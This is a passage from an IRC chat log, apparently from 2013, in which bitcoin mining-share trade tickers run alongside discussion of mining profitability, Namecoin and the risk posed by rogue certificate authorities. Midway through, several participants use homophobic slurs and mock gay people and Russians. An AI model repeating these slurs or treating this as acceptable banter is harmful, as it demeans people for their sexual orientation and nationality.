moral was "diversify" Sep 03 21:27:32 why not just read buffett ? Sep 03 21:28:09 i did, the only answer I could find was based on interpretation and I'd like to hear yours but I guess if it's all the same... Sep 03 21:34:06 but i mean answer to what ? Sep 03 21:35:58 [BTCTC] [ACTIVEMINING] 10 @ 0.00382 = 0.0382 BTC [-] Sep 03 21:36:21 [BTCTC] [BASIC-MINING] 2 @ 0.1359 = 0.2718 BTC [-] Sep 03 21:39:12 [HAVELOCK] [DEALCO] 10 @ 0.0112 = 0.112 BTC [-] Sep 03 21:39:51 [BTCTC] [BASIC-MINING] 10 @ 0.136 = 1.36 BTC [+] Sep 03 21:39:53 mircea_popescu: I guess in relation to what we'll experience with mining when the difficulty catches up to the hash rate. Sep 03 21:40:12 seems to me it's quite plainly stated there. Sep 03 21:40:29 [HAVELOCK] [AM100] 1 @ 0.0235 BTC [-] Sep 03 21:40:37 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Sep 03 21:41:23 [HAVELOCK] [XBOND] 190 @ 0.00107895 = 0.205 BTC [+] Sep 03 21:41:27 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Sep 03 21:41:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.02342 = 0.0468 BTC [-] Sep 03 21:41:58 [BTCTC] [ACTIVEMINING] 40 @ 0.0038 = 0.152 BTC [-] Sep 03 21:42:23 so pretty much the mining companies will have to invest in other things instead of mining (as warren buffet did in lieu of textiles)? Sep 03 21:42:29 [BTCTC] [TAT.ASICMINER] 16 @ 0.02342 = 0.3747 BTC [-] Sep 03 21:43:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [+] Sep 03 21:43:32 [BTCTC] [DMS.SELLING] 26 @ 0.0129 = 0.3354 BTC [-] Sep 03 21:43:45 like designing other asics, consulting, deployment of custom asic farms, etc Sep 03 21:44:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.024 = 0.144 BTC [+] Sep 03 21:44:14 [BTCTC] [TAT.ASICMINER] 37 @ 0.024 = 0.888 BTC [+] Sep 03 21:44:23 [BTCTC] [BASIC-MINING] 5 @ 0.136 = 0.68 BTC [+] Sep 03 21:44:57 [BTCTC] [BASIC-MINING] 7 @ 0.136 = 0.952 BTC [+] Sep 03 21:45:21 [BTCTC] [RSM] 3 @ 0.009097 = 0.0273 BTC [-] Sep 03 21:47:05 [BTCTC] [BFMINES] 1 @ 0.002501 BTC [-] Sep 03 21:47:49 [BTCTC] [BTC-GROWTH] 5 @ 0.1015 = 0.5075 BTC [+] Sep 03 21:48:12 so pretty much mining is a on the long term a way to lose btc, not make it. Sep 03 21:48:21 if you're in it for profit you'd better find something else. Sep 03 21:48:40 if you're into it for epeen, you'd better get used to having to buy btc periodically. Sep 03 21:49:06 [BTCTC] [ACTIVEMINING] 60 @ 0.0038 = 0.228 BTC [-] Sep 03 21:49:34 [BTCTC] [DMS.MINING] 14 @ 0.002898 = 0.0406 BTC [-] Sep 03 21:49:47 [BTCTC] [BASIC-MINING] 2 @ 0.136 = 0.272 BTC [+] Sep 03 21:50:01 [BTCTC] [LABCOIN] 4 @ 0.00369 = 0.0148 BTC [-] Sep 03 21:51:37 [BTCTC] [DMS.PURCHASE] 2 @ 0.01553 = 0.0311 BTC [-] Sep 03 21:52:46 [BTCTC] [DMS.MINING] 10 @ 0.002898 = 0.029 BTC [-] Sep 03 21:53:27 [BTCTC] [LABCOIN] 1 @ 0.00369 BTC [-] Sep 03 21:53:39 [BTCTC] [LABCOIN] 50 @ 0.003689 = 0.1845 BTC [-] Sep 03 21:53:46 [HAVELOCK] [DEALCO] 10 @ 0.01289 = 0.1289 BTC [+] Sep 03 21:55:23 [HAVELOCK] [DEALCO] 10 @ 0.01289 = 0.1289 BTC [+] Sep 03 21:56:47 [HAVELOCK] [SMG] 37 @ 0.00020999 = 0.0078 BTC [+] Sep 03 21:58:05 Database connection lost! 5 retries until I give up entirely! Sep 03 21:58:19 [HAVELOCK] [DEALCO] 100 @ 0.01289 = 1.289 BTC [+] Sep 03 21:58:45 [HAVELOCK] [DEALCO] 116 @ 0.01289 = 1.4952 BTC [+] Sep 03 21:58:47 [BTCTC] [DMS.SELLING] 64 @ 0.01312 = 0.8397 BTC [+] Sep 03 21:58:48 [BTCTC] [DMS.SELLING] 100 @ 0.01324 = 1.324 BTC [+] Sep 03 22:00:18 Database connection lost! 4 retries until I give up entirely! Sep 03 22:01:42 kryptotrader, never give up! Never surrender! Sep 03 22:01:51 hi, assbot Sep 03 22:02:06 I thought he responded to salutations Sep 03 22:02:59 Only to people he likes. Sep 03 22:04:14 T_T Sep 03 22:04:18 lol Sep 03 22:04:23 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [-] Sep 03 22:04:24 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [-] Sep 03 22:04:30 [HAVELOCK] [AM100] 1 @ 0.0235 BTC [-] Sep 03 22:06:31 [HAVELOCK] [CFIG] 3 @ 0.12110001 = 0.3633 BTC [+] Sep 03 22:08:52 [BTCTC] [DMS.SELLING] 38 @ 0.01324 = 0.5031 BTC [+] Sep 03 22:12:26 [BTCTC] [TAT.ASICMINER] 23 @ 0.024 = 0.552 BTC [+] Sep 03 22:12:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.024 = 0.24 BTC [+] Sep 03 22:13:49 [BTCTC] [TAT.ASICMINER] 38 @ 0.02411 = 0.9162 BTC [+] Sep 03 22:13:51 [BTCTC] [TAT.ASICMINER] 53 @ 0.02411 = 1.2778 BTC [+] Sep 03 22:13:53 $email Sep 03 22:13:54 smickles: No new messages received. Sep 03 22:14:04 [BTCTC] [NASTY-PT] 10 @ 0.002889 = 0.0289 BTC [-] Sep 03 22:14:38 $email Sep 03 22:14:39 jurov: To sign up for this service, contact smickles. Cost will be 0.01 BTC. Sep 03 22:14:52 heh Sep 03 22:14:54 lol Sep 03 22:14:57 $email Sep 03 22:15:00 mircea_popescu: No new messages received. Sep 03 22:15:06 some people are just cool like that. Sep 03 22:15:17 $coolkids Sep 03 22:15:22 [HAVELOCK] [LABCO] 10 @ 0.0032 = 0.032 BTC [+] Sep 03 22:15:39 [BTCTC] [BTC-GROWTH] 1 @ 0.1015 BTC [+] Sep 03 22:15:41 [BTCTC] [BTC-GROWTH] 5 @ 0.1016 = 0.508 BTC [+] Sep 03 22:15:42 [BTCTC] [BTC-GROWTH] 10 @ 0.1016 = 1.016 BTC [+] Sep 03 22:15:44 [BTCTC] [BTC-GROWTH] 5 @ 0.1017 = 0.5085 BTC [+] Sep 03 22:15:44 [BTCTC] [BTC-GROWTH] 5 @ 0.1018 = 0.509 BTC [+] Sep 03 22:15:45 [BTCTC] [BTC-GROWTH] 5 @ 0.1019 = 0.5095 BTC [+] Sep 03 22:15:46 [BTCTC] [BTC-GROWTH] 20 @ 0.102 = 2.04 BTC [+] Sep 03 22:15:47 [BTCTC] [BTC-GROWTH] 20 @ 0.102 = 2.04 BTC [+] Sep 03 22:15:53 ThickAsThieves: nice try, but you can't blacklist all of us that easily Sep 03 22:15:58 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Sep 03 22:15:59 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] Sep 03 22:16:00 [HAVELOCK] [LABCO] 30 @ 0.0032 = 0.096 BTC [+] Sep 03 22:16:02 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] Sep 03 22:16:08 ;;8ball Do I need $email to be cool? Sep 03 22:16:08 I doubt it very much. Sep 03 22:16:15 lol Sep 03 22:16:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02411 BTC [+] Sep 03 22:16:50 gribble never lies Sep 03 22:17:22 [HAVELOCK] [CFIG] 3 @ 0.12110001 = 0.3633 BTC [+] Sep 03 22:17:27 ;;8ball does gribble eat shit ? Sep 03 22:17:29 [HAVELOCK] [CFIG] 4 @ 0.1211 = 0.4844 BTC [-] Sep 03 22:17:30 Maybe... Sep 03 22:17:34 lol Sep 03 22:17:36 :D Sep 03 22:17:43 [HAVELOCK] [DEALCO] 40 @ 0.0128 = 0.512 BTC [-] Sep 03 22:18:11 ;;8ball Has MPEx ever been hacked? Sep 03 22:18:12 What are you asking me for? Sep 03 22:18:23 bleh Sep 03 22:18:43 ;;8ball Is it a game of reach? Sep 03 22:18:43 No chance. Sep 03 22:18:48 dealco gem at 28%! Sep 03 22:18:58 ;;8ball is getting anal more fulfilling than doing the dishes ? Sep 03 22:19:00 Unlikely. Sep 03 22:19:15 [BTCTC] [DMS.MINING] 1 @ 0.0028 BTC [-] Sep 03 22:19:16 i take this as a small penis joke. Sep 03 22:19:27 lol Sep 03 22:20:33 labcoin pumping dealco https://bitcointalk.org/index.php?topic=283075.msg3074347#msg3074347 Sep 03 22:21:07 Haha. Sep 03 22:21:11 [MPEX] [S.MPOE] 7800 @ 0.00086984 = 6.7848 BTC [+] Sep 03 22:21:12 Of course. Sep 03 22:21:16 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0007575 = 0.0015 BTC [+] Sep 03 22:21:37 ;;8ball is mircea_popescu getting laid Sep 03 22:21:39 Yes! Sep 03 22:21:41 :D Sep 03 22:21:42 [HAVELOCK] [XBOND] 3 @ 0.0010789 = 0.0032 BTC [-] Sep 03 22:22:03 [BTCTC] [DMS.SELLING] 10 @ 0.01324 = 0.1324 BTC [+] Sep 03 22:23:07 ThickAsThieves til thesweede is esl. Sep 03 22:23:18 ;;8ball will the Labcoin chips explode under light load? Sep 03 22:23:19 It is so. Sep 03 22:23:23 Knew it. Sep 03 22:23:41 ;;8ball will the answer to this question be affirmative ? Sep 03 22:23:42 The answer is a resounding no. Sep 03 22:24:05 coulda been worse. Sep 03 22:24:25 [HAVELOCK] [DEALCO] 6 @ 0.01497999 = 0.0899 BTC [+] Sep 03 22:24:46 nice Sep 03 22:25:07 ffs Sep 03 22:25:14 This dealco bullshit. Sep 03 22:25:36 dont hate, make your own website and IPO Sep 03 22:25:56 [HAVELOCK] [XBOND] 297 @ 0.0010789 = 0.3204 BTC [-] Sep 03 22:26:57 [HAVELOCK] [XBOND] 1000 @ 0.0010789 = 1.0789 BTC [-] Sep 03 22:27:03 It's already in the works. I call it Force-Mining ( mircea_popescu gets some royalties for the name ). Once I raid 13000 BTC I will train share holders how to hash with their minds using the Force. Sep 03 22:27:04 there we go Sep 03 22:27:09 [HAVELOCK] [XBOND] 456 @ 0.0010789 = 0.492 BTC [-] Sep 03 22:27:19 perfect Sep 03 22:27:24 [HAVELOCK] [XBOND] 247 @ 0.0010789 = 0.2665 BTC [-] Sep 03 22:27:48 Original name was Yoda-Miner. Sep 03 22:28:22 [BTCTC] [LTC-ATF.B2] 10 @ 0.01042 = 0.1042 BTC [-] Sep 03 22:28:44 but how mant GHs can one brain get? Sep 03 22:28:50 If anyone complains about a low hashrate I'll blame it on their midi-chlorian count Sep 03 22:28:57 ah Sep 03 22:29:19 As you can see I've thought this one through. Sep 03 22:29:23 It's a winner. Sep 03 22:29:29 I'm planning my retirement. Sep 03 22:29:35 Scientologists everywhere agree. Sep 03 22:29:59 [HAVELOCK] [LABCO] 100 @ 0.0032 = 0.32 BTC [+] Sep 03 22:30:58 [HAVELOCK] [AM1] 1 @ 2.4 BTC [+] Sep 03 22:31:14 http://www8.hp.com/us/en/products/proliant-workstation-blades/product-detail.html?oid=5288619#!tab=features Sep 03 22:31:18 no Sep 03 22:31:19 wrong one Sep 03 22:31:20 HP ProLiant WS460c Gen8 E5-2637 2P 32GB-R Workstation Sep 03 22:31:24 http://www.jedichurch.org/ Sep 03 22:31:24 [HAVELOCK] [DEALCO] 150 @ 0.0149 = 2.235 BTC [-] Sep 03 22:31:25 Jedi Church - Jedi Religion and Jedi Faith Sep 03 22:31:26 This one. Sep 03 22:31:47 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Sep 03 22:32:34 http://www.youtube.com/watch?v=hWiDmpEPqbg Sep 03 22:32:35 Inside The Actors Studio Dave Chappelle - YouTube Sep 03 22:32:37 [HAVELOCK] [AM100] 8 @ 0.0235 = 0.188 BTC [-] Sep 03 22:32:38 wow this is great Sep 03 22:32:51 Dave Chappelle is da greatest comedian ever. Sep 03 22:33:01 I love Dave Chappelle. Sep 03 22:33:08 He is an all around good dude. Sep 03 22:33:49 He gets called a lot of stupid things because he got sick of hollywood. Sep 03 22:33:52 ;;ident Sep 03 22:33:53 You are identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Sep 03 22:34:01 doctor said I need a backiotomy Sep 03 22:34:04 [HAVELOCK] [DEALCO] 50 @ 0.0121 = 0.605 BTC [-] Sep 03 22:34:07 [HAVELOCK] [DEALCO] 10 @ 0.012 = 0.12 BTC [-] Sep 03 22:38:09 not lobotomy? Sep 03 22:39:17 [MPEX] [S.MPOE] 5284 @ 0.00086984 = 4.5962 BTC [+] Sep 03 22:39:37 [HAVELOCK] [DEALCO] 10 @ 0.0114889 = 0.1149 BTC [-] Sep 03 22:40:02 [HAVELOCK] [SDSTM] 3 @ 0.00345 = 0.0104 BTC [-] Sep 03 22:40:38 someone hasnt seen half baked... Sep 03 22:41:49 jurov is from russia Sep 03 22:41:55 so they don't have much tv Sep 03 22:42:00 /troll Sep 03 22:42:49 well, ER and dr.house are forbidden to air here Sep 03 22:42:55 too many fags Sep 03 22:43:23 lol Sep 03 22:43:50 RUssians are terrified of gays. Sep 03 22:44:08 which means Russians are all closet homos Sep 03 22:44:33 Obviously. Sep 03 22:44:44 Russia: The Gayest Nation on Earth. Sep 03 22:46:37 https://www.youtube.com/watch?v=5RFeMz-hK7Y Sep 03 22:46:38 Rucka Rucka Ali-Russia's Gay - YouTube Sep 03 22:47:36 [BTCTC] [DMS.SELLING] 20 @ 0.01325 = 0.265 BTC [+] Sep 03 22:48:02 [BTCTC] [BTC-GROWTH] 8 @ 0.1021 = 0.8168 BTC [+] Sep 03 22:48:04 [BTCTC] [BTC-GROWTH] 10 @ 0.1022 = 1.022 BTC [+] Sep 03 22:49:05 [BTCTC] [DMS.PURCHASE] 17 @ 0.01578 = 0.2683 BTC [+] Sep 03 22:49:07 [HAVELOCK] [CFIG] 5 @ 0.1211 = 0.6055 BTC [-] Sep 03 22:50:08 [HAVELOCK] [DEALCO] 10 @ 0.014 = 0.14 BTC [+] Sep 03 22:51:50 [HAVELOCK] [DEALCO] 30 @ 0.014 = 0.42 BTC [+] Sep 03 22:53:39 [BTCTC] [COGNITIVE] 1 @ 0.2886 BTC [-] Sep 03 22:53:40 [BTCTC] [COGNITIVE] 19 @ 0.2613 = 4.9647 BTC [-] Sep 03 22:53:52 [BTCTC] [LABCOIN] 1 @ 0.0037 BTC [+] Sep 03 22:54:23 [BTCTC] [DMS.SELLING] 1 @ 0.01325 BTC [+] Sep 03 22:55:16 [MPEX] [S.MPOE] 1016 @ 0.00086984 = 0.8838 BTC [+] Sep 03 22:55:28 [MPEX] [S.MPOE] 1934 @ 0.00086994 = 1.6825 BTC [+] Sep 03 22:55:35 [BTCTC] [LABCOIN] 39 @ 0.0037 = 0.1443 BTC [+] Sep 03 22:55:50 too many fags in slovakia or in dr house ? Sep 03 22:56:01 both Sep 03 22:56:27 [BTCTC] [LABCOIN] 276 @ 0.003723 = 1.0275 BTC [+] Sep 03 22:56:28 [BTCTC] [LABCOIN] 1234 @ 0.003725 = 4.5967 BTC [+] Sep 03 22:56:35 lol Sep 03 22:56:58 [BTCTC] [BASIC-MINING] 15 @ 0.136 = 2.04 BTC [+] Sep 03 22:56:59 House was pretty cool, but its femenine viewership ruined it Sep 03 22:57:16 but how mant GHs can one brain get? YOU CAN DO ANYTHING Sep 03 22:59:05 it will all end up with mining rig on altar Sep 03 22:59:21 and 24/7 prayer maraton around Sep 03 22:59:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.02343 = 0.0469 BTC [-] Sep 03 22:59:45 [BTCTC] [TAT.ASICMINER] 8 @ 0.02342 = 0.1874 BTC [-] Sep 03 23:00:01 maybe even sacrifices will be necessary Sep 03 23:00:16 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Sep 03 23:00:38 [BTCTC] [BASIC-MINING] 3 @ 0.136 = 0.408 BTC [+] Sep 03 23:00:53 [MPEX] [S.MPOE] 14350 @ 0.00086994 = 12.4836 BTC [+] Sep 03 23:02:17 [BTCTC] [BASIC-MINING] 6 @ 0.136 = 0.816 BTC [+] Sep 03 23:02:55 [HAVELOCK] [DEALCO] 25 @ 0.012 = 0.3 BTC [-] Sep 03 23:03:09 [BTCTC] [BTC-GROWTH] 2 @ 0.1024 = 0.2048 BTC [+] Sep 03 23:03:34 [BTCTC] [COGNITIVE] 1 @ 0.2614 BTC [+] Sep 03 23:05:21 [BTCTC] [BASIC-MINING] 2 @ 0.136 = 0.272 BTC [+] Sep 03 23:05:34 [BTCTC] [BITVPS] 2 @ 0.002547 = 0.0051 BTC [+] Sep 03 23:08:52 [BTCTC] [DMS.PURCHASE] 40 @ 0.01578 = 0.6312 BTC [+] Sep 03 23:10:51 [BTCTC] [DMS.MINING] 37 @ 0.0028 = 0.1036 BTC [-] Sep 03 23:14:43 [BTCTC] [LABCOIN] 5 @ 0.003722 = 0.0186 BTC [-] Sep 03 23:14:58 [BTCTC] [LABCOIN] 5 @ 0.003722 = 0.0186 BTC [-] Sep 03 23:21:01 [HAVELOCK] [XBOND] 1000 @ 0.00107892 = 1.0789 BTC [+] Sep 03 23:21:41 maybe less fags in somalia..i read something where they are very much against that. Sep 03 23:21:51 .also like in this youtube video- where Uganda is even against it. It is so painful they have to take drugs. Like Ice Cream: http://www.youtube.com/watch?v=On3etueeGIg Sep 03 23:21:55 [HAVELOCK] [XBOND] 200 @ 0.0011 = 0.22 BTC [+] Sep 03 23:21:58 [HAVELOCK] [XBOND] 490 @ 0.0011 = 0.539 BTC [+] Sep 03 23:22:16 [BTCTC] [BASIC-MINING] 4 @ 0.136 = 0.544 BTC [+] Sep 03 23:22:38 [HAVELOCK] [XBOND] 925 @ 0.00110598 = 1.023 BTC [+] Sep 03 23:24:44 I like how the anti gay guy knows so much about gays Sep 03 23:25:04 fuck I just found my old account on bitcointalk Sep 03 23:25:06 and has gay porn and his computer Sep 03 23:25:23 and the price was 500 bitcoins for $1 :(((( Sep 03 23:25:24 lol yeah Sep 03 23:26:10 that's when I discovered bitcoin too I guess Sep 03 23:26:13 didn't buy any Sep 03 23:26:24 hurts to look at doesn't it Sep 03 23:26:49 one of my first post i said I hope it becomes big it's great idea..and satoshi answer my questions Sep 03 23:26:52 it allows me to mock people who complain about early adopters Sep 03 23:27:03 haha, cool Sep 03 23:27:09 that early adopters thing is bullshit Sep 03 23:27:15 [HAVELOCK] [AM1] 1 @ 2.4 BTC [+] Sep 03 23:27:18 [HAVELOCK] [AM1] 1 @ 2.36 BTC [-] Sep 03 23:27:22 like anybody knew... Sep 03 23:27:38 like early adoption phase is over Sep 03 23:27:44 there are people who thought they made a profit by selling at $10 too :p Sep 03 23:27:45 [BTCTC] [TAT.ASICMINER] 8 @ 0.02342 = 0.1874 BTC [-] Sep 03 23:27:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.02341 = 0.2341 BTC [-] Sep 03 23:27:46 exactly Sep 03 23:27:46 [BTCTC] [TAT.ASICMINER] 7 @ 0.0234 = 0.1638 BTC [-] Sep 03 23:27:47 [BTCTC] [TAT.ASICMINER] 24 @ 0.0234 = 0.5616 BTC [-] Sep 03 23:27:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.02332 = 0.1632 BTC [-] Sep 03 23:27:49 y'all just can't hack dem orders of magnitude Sep 03 23:27:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.02331 = 0.3497 BTC [-] Sep 03 23:27:50 [BTCTC] [TAT.ASICMINER] 20 @ 0.0233 = 0.466 BTC [-] Sep 03 23:27:59 lie Sep 03 23:28:01 like* Sep 03 23:28:03 I remember thinking crazy at dollar parity Sep 03 23:28:17 (sum shitbucks)/(sum bitcoins) Sep 03 23:28:44 [BTCTC] [DMS.MINING] 1 @ 0.002701 BTC [-] Sep 03 23:28:46 [BTCTC] [DMS.MINING] 309 @ 0.0027 = 0.8343 BTC [-] Sep 03 23:29:22 [BTCTC] [BASIC-MINING] 1 @ 0.135 BTC [-] Sep 03 23:29:33 [BTCTC] [DMS.MINING] 94 @ 0.00268 = 0.2519 BTC [-] Sep 03 23:29:35 [BTCTC] [DMS.MINING] 773 @ 0.002676 = 2.0685 BTC [-] Sep 03 23:31:08 sure we'll all be kings if bitcoin takes over the world Sep 03 23:31:27 so mine moar! Sep 03 23:31:36 exactly Sep 03 23:31:50 if I could live off it while waiting, it still would be better :p Sep 03 23:31:54 so crazy i havent even mined in prob 3 years Sep 03 23:32:13 but in 5 years in prob look back and think why the fuck Sep 03 23:32:19 cause we can be mining now Sep 03 23:32:19 [BTCTC] [BTC-GROWTH] 1 @ 0.1024 BTC [+] Sep 03 23:32:52 ;;nethash Sep 03 23:32:53 699590.330123 Sep 03 23:32:57 I mined about 0.5 BTC, and got 0.5 BTC through a faucet Sep 03 23:33:12 I used to click on that faucet all the time Sep 03 23:33:16 think it was 50btc Sep 03 23:33:36 there's a lot to be said for developing a fiat revenue stream and turning that into bitcoins Sep 03 23:33:44 has anyone seen that cognitive F2? Sep 03 23:33:58 guy says he will raise 1PH but he wants 3000BTC Sep 03 23:34:05 I think I didn't get into bitcoin until later because it was hard to compile, the makefile was shit Sep 03 23:34:25 compile? i remember v.02 i didn't have to compile Sep 03 23:34:37 I never run binaries ;) Sep 03 23:34:55 oh ok, yeah first time i used it i thought it felt like a botnet Sep 03 23:35:15 using 100% cpu for 12 hours and give you 1$ in the morning Sep 03 23:35:27 my most sucessful mining must have been namecoins actually (before merged mining) Sep 03 23:36:03 i thought namecoins were good when announced Sep 03 23:36:14 do you still have to use strnge proxy or dns server? Sep 03 23:36:30 there was this cool idea, ripple Sep 03 23:36:33 it's still one of the best ideas to come out of bitcoin Sep 03 23:36:45 which got turned into this shitty thing called ripple nowadays Sep 03 23:37:08 but hard to actually make use of it; you need the client, a dns resolver, which no easy setup for noobs Sep 03 23:37:19 with Sep 03 23:37:44 still nice though Sep 03 23:38:53 I use it to store stuff Sep 03 23:39:00 like fingerprints Sep 03 23:40:03 yeah i was a big fan of namecoin too. if a main registrar ever picks up the .bit domains, it could be huge. Sep 03 23:43:12 namecoin could allow censorship free domains, and eliminate the issue of centralized ssl CAs Sep 03 23:43:50 right now, any rogue preapproved CA can issue a certificate Sep 03 23:44:07 so you only need one to make the system useless Sep 03 23:45:00 Erm. Sep 03 23:45:03 That's FUD. Sep 03 23:45:06 and you know it. Sep 03 23:45:14 no; actually, it happened Sep 03 23:45:16 a rouge CA is only useful until the associated CRLs are correctly updated. Sep 03 23:45:23 I know it happened with the diginotar etc attack. Sep 03 23:45:33 but they're not exactly longetivity attacks if you have a proper root CA in use. Sep 03 23:45:37 sure, but what about government coercion? Sep 03 23:45:41 gtfo. Sep 03 23:45:44 it won't be an attack Sep 03 23:45:52 it won't be known Sep 03 23:46:14 erm... Sep 03 23:46:42 and diginotar was still a huge failure, albeit temporary; we have the means to make it not happen Sep 03 23:46:59 they'd have to coerice [sp?] multiple root servers / root CAs. Sep 03 23:47:15 [BTCTC] [TAT.ASICMINER] 28 @ 0.02322 = 0.6502 BTC [-] Sep 03 23:47:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.02322 = 0.0464 BTC [-] Sep 03 23:47:36 why? Sep 03 23:47:47 because root CAs can revoke bad certs. Sep 03 23:47:47 [BTCTC] [BASIC-MINING] 3 @ 0.135 = 0.405 BTC [-] Sep 03 23:48:01 Do you understand how PKI/Digital Certificates work or are you just spreading FUD? Sep 03 23:48:06 you can't have distributed DNS/SSL when underlying TCP/IP stack is vulnerable to coercion Sep 03 23:48:21 if it's public knowledge the certificate is bad Sep 03 23:48:22 lol coerice! Sep 03 23:48:24 i love you bitz Sep 03 23:48:35 if they combined namecoin with tor, that makes more sense Sep 03 23:48:36 spelling isn't my strongest point :P Sep 03 23:48:48 ;) Sep 03 23:49:04 you just added an extra 'i' because you are generous, that's all. Sep 03 23:49:21 you know it... :) Sep 03 23:49:22 making sure there's plenty of vowels to go around. good man. Sep 03 23:50:10 http://arstechnica.com/security/2013/01/turkish-government-agency-spoofed-google-certificate-accidentally/ Sep 03 23:50:13 Turkish government agency spoofed Google certificate “accidentally” | Ars Technica Sep 03 23:51:37 [BTCTC] [ASICMINER-PT] 5 @ 2.47 = 12.35 BTC [-] Sep 03 23:52:38 lol Sep 03 23:53:14 they'd have to coerice [sp?] multiple root servers / root CAs. << this is irrelevant Sep 03 23:53:28 they are currently coercing multiple isps to give out information illegally. Sep 03 23:54:07 [BTCTC] [PAJKA.BOND] 2 @ 0.0106 = 0.0212 BTC [-] Sep 03 23:54:17 [MPEX] [S.MPOE] 5700 @ 0.00086994 = 4.9587 BTC [+] Sep 03 23:54:29 the thing is, I know what is between my server and my users is secure; unless they serve another certificate by mitm Sep 03 23:54:41 Erm. Sep 03 23:54:51 "erm" Sep 03 23:54:51 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.0006201 = 0.0037 BTC [-] Sep 03 23:54:54 I have to leave this conversation at once. Sep 03 23:55:07 what a fool :( Sep 03 23:57:13 another solution to the issue is http://web.monkeysphere.info/ - as dead as namecoin though Sep 03 23:58:58 who? Sep 04 00:00:33 [BTCTC] [PETA-MINE] 1 @ 0.6302 BTC [-] Sep 04 00:01:36 [BTCTC] [COGNITIVE] 1 @ 0.32 BTC [+] Sep 04 00:01:37 [BTCTC] [COGNITIVE] 1 @ 0.32 BTC [+] Sep 04 00:01:39 [BTCTC] [COGNITIVE] 1 @ 0.3449 BTC [+] Sep 04 00:01:55 [HAVELOCK] [DEALCO] 10 @ 0.01205 = 0.1205 BTC [+] Sep 04 00:01:56 [HAVELOCK] [DEALCO] 1 @ 0.012 BTC [-] Sep 04 00:01:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02389 BTC [+] Sep 04 00:03:46 ;;bcstats Sep 04 00:03:48 Current Blocks: 255963 | Current Difficulty: 6.5750060149084814E7 | Next Difficulty At Block: 256031 | Next Difficulty In: 68 blocks | Next Difficulty In About: 8 hours, 32 minutes, and 40 seconds | Next Difficulty Estimate: 86618943.3491 | Estimated Percent Change: 31.73972 Sep 04 00:05:31 [BTCTC] [PETA-MINE] 6 @ 0.65 = 3.9 BTC [+] Sep 04 00:05:45 ;;nethash Sep 04 00:05:46 699481.96915 Sep 04 00:05:47 [BTCTC] [PETA-MINE] 38 @ 0.65 = 24.7 BTC [+] Sep 04 00:05:55 wow it is going down Sep 04 00:07:04 .d Sep 04 00:07:10 [BTCTC] [ASICMINER-PT] 1 @ 2.498 BTC [+] Sep 04 00:07:18 65750060.14908 | Next Diff in 67 blocks | Estimated Change: 31.3961% in 0d 7h 36m 5s Sep 04 00:07:23 [BTCTC] [LABCOIN] 30 @ 0.003715 = 0.1115 BTC [-] Sep 04 00:07:26 thats what she said Sep 04 00:07:28 actually it;s slightkly up from earlier Sep 04 00:07:32 awwww yeah\ Sep 04 00:08:51 kakobrekla: don't you mean KAKOBREKLA!!!! Sep 04 00:09:18 [MPEX] [S.MPOE] 18900 @ 0.00086994 = 16.4419 BTC [+] Sep 04 00:09:51 [BTCTC] [BASIC-MINING] 3 @ 0.1359 = 0.4077 BTC [+] Sep 04 00:10:33 [HAVELOCK] [XBOND] 1 @ 0.00110597 BTC [-] Sep 04 00:11:18 [BTCTC] [LABCOIN] 1 @ 0.003722 BTC [+] Sep 04 00:11:59 [BTCTC] [TAT.VIRTUALMINE] 164 @ 0.00064 = 0.105 BTC [+] Sep 04 00:12:01 [BTCTC] [TAT.VIRTUALMINE] 2809 @ 0.0006204 = 1.7427 BTC [-] Sep 04 00:12:20 ;;estimate Sep 04 00:12:21 Next difficulty estimate | 86497376.9184 based on data since last change | 97715011.2253 based on data for last three days Sep 04 00:12:41 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0006205 = 0.0621 BTC [+] Sep 04 00:12:42 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0006202 = 0.062 BTC [-] Sep 04 00:12:52 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0007521 = 0.0015 BTC [+] Sep 04 00:13:17 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.0006106 = 0.055 BTC [-] Sep 04 00:13:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0006102 BTC [-] Sep 04 00:13:20 [BTCTC] [TAT.VIRTUALMINE] 35 @ 0.0006 = 0.021 BTC [-] Sep 04 00:19:11 [BTCTC] [TAT.ASICMINER] 6 @ 0.0234 = 0.1404 BTC [-] Sep 04 00:24:30 [BTCTC] [BFMINES] 10 @ 0.001644 = 0.0164 BTC [-] Sep 04 00:29:15 [BTCTC] [LABCOIN] 1 @ 0.0034 BTC [-] Sep 04 00:31:26 [BTCTC] [LABCOIN] 9 @ 0.0034 = 0.0306 BTC [-] Sep 04 00:37:19 [BTCTC] [LABCOIN] 5 @ 0.003681 = 0.0184 BTC [+] Sep 04 00:37:21 [BTCTC] [LABCOIN] 1150 @ 0.00368 = 4.232 BTC [-] Sep 04 00:37:22 [BTCTC] [LABCOIN] 2 @ 0.003675 = 0.0074 BTC [-] Sep 04 00:37:57 [BTCTC] [DMS.PURCHASE] 4 @ 0.01578 = 0.0631 BTC [+] Sep 04 00:40:05 [BTCTC] [BTC-GROWTH] 7 @ 0.1024 = 0.7168 BTC [+] Sep 04 00:40:18 [BTCTC] 